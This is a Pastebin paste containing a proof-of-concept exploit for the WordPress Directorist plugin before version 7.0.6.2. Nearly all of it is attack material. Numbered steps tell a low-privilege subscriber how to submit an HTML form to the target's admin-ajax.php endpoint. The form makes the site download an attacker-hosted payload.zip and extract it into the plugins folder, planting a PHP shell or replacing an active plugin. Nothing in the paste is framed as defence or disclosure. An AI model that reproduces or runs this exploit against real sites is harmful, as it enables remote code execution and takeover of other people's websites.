Advertisement
Guest User

Directorist < 7.0.6.2 remote file upload exploit vulnerability

a guest
Nov 17th, 2021
772
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.04 KB | None
  1. <?php
  2. /*
  3. POC: Upload files to the plugins folder of any site running directorist < 7.0.6.2
  4. Can be used to upload PHP files or replace a whole active plugin.
  5.  
  6. 1. Register / Login as user (subscriber will do).
  7. 2. Paste below HTML into any page on site.
  8. 3. Replace [target-site] with the target URL.
  9. 4. Repalce [site-with-payload-zip] with the URL hosting your zip file and submit the form.
  10. 5. Zip file contents will be extracted in plugins folder https://[target-site].com/wp-content/plugins/shell.php
  11. */
  12. ?>
  13. <form action="https://[target-site].com/wp-admin/admin-ajax.php" method="post">
  14.   <input type="text"  name="action" value="atbdp_download_file"><br>
  15.     <input type="text"  name="download_item[download_link]" value='https://[site-with-payload-zip].com/payload.zip'><br>    
  16.     <input type="text"  name="download_item[skip_licencing]" value='true'><br>
  17.     <input type="text"  name="download_item[permalink]" value='true'><br>    
  18.     <input type="text"  name="type" value="plugin"><br>
  19.   <input type="submit" value="Submit">
  20. </form>
Advertisement
RAW Paste Data Copied
Advertisement